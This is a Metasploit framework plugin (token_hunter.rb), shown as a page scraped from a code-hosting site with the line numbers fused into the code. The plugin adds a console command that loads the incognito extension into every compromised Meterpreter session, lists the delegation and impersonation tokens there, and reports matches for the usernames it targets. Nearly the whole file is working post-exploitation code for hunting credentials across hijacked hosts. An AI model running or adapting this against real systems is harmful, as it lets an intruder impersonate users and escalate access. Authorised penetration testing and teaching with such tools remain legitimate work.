Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/plugins/token_hunter.rb
Views: 11705
#1# $Id$2# $Revision$3#45module Msf6class Plugin::TokenHunter < Msf::Plugin78class TokenCommandDispatcher9include Msf::Ui::Console::CommandDispatcher1011def name12'Token Hunter'13end1415def commands16{17'token_hunt_user' => 'Scan all connected Meterpreter sessions for active tokens corresponding to one or more users'18}19end2021def cmd_token_hunt_user(*args)22opts = Rex::Parser::Arguments.new(23'-h' => [ false, 'This help menu'],24'-f' => [ true, 'A file containing a list of users to search for (one per line)']25)2627opt_userfile = nil28opt_users = []2930opts.parse(args) do |opt, _idx, val|31case opt32when '-h'33print_line('Usage: token_hunt_user [options] <username> [username] .. [username]')34print_line(opts.usage)35return36when '-f'37opt_userfile = val38else39opt_users << val40end41end4243if opt_userfile44::File.open(opt_userfile, 'rb') do |fd|45fd.each_line do |line|46line.strip!47next if line.empty?48next if line =~ /^#/4950opt_users << line51end52end53end5455opt_users.uniq!5657tokens_del = {}58tokens_imp = {}5960framework.sessions.each_key do |sid|61session = framework.sessions[sid]62next if session.type != 'meterpreter'6364print_status(">> Scanning session #{session.sid} / #{session.session_host}")6566if !session.incognito67session.core.use('incognito')68end6970if !session.incognito71print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")72next73end7475res = session.incognito.incognito_list_tokens(0)76next unless res7778res['delegation'].split("\n").each do |user|79opt_users.each do |needle|80ndom, nusr = needle.split('\\')81if !nusr82nusr = ndom83ndom = nil84end8586if (!user.nil? && ndom && (user.strip.downcase == needle.strip.downcase))87print_status("FOUND: #{session.sid} - #{session.session_host} - #{user} (delegation)")88next89end9091_fdom, fusr = user.split('\\')9293if (!fusr.nil? && !ndom && (fusr.strip.downcase == nusr.strip.downcase))94print_status("FOUND: #{session.sid} - #{session.session_host} - #{user} (delegation)")95end96end9798tokens_del[user] ||= []99tokens_del[user] << session.sid100end101102res['impersonation'].split("\n").each do |user|103opt_users.each do |needle|104ndom, nusr = needle.split('\\')105if !nusr106nusr = ndom107ndom = nil108end109110if (!user.nil? && ndom && (user.strip.downcase == needle.strip.downcase))111print_status(">> Found #{session.sid} - #{session.session_host} - #{user} (impersonation)")112next113end114115_fdom, fusr = user.split('\\')116if (!fusr.nil? && !ndom && (fusr.strip.downcase == nusr.strip.downcase))117print_status(">> Found #{session.sid} - #{session.session_host} - #{user} (impersonation)")118end119end120121tokens_imp[user] ||= []122tokens_imp[user] << session.sid123end124end125end126end127128def initialize(framework, opts)129super130add_console_dispatcher(TokenCommandDispatcher)131end132133def cleanup134remove_console_dispatcher('Token Hunter')135end136137def name138'token_hunter'139end140141def desc142'Search all active Meterpreter sessions for specific tokens'143end144end145end146147148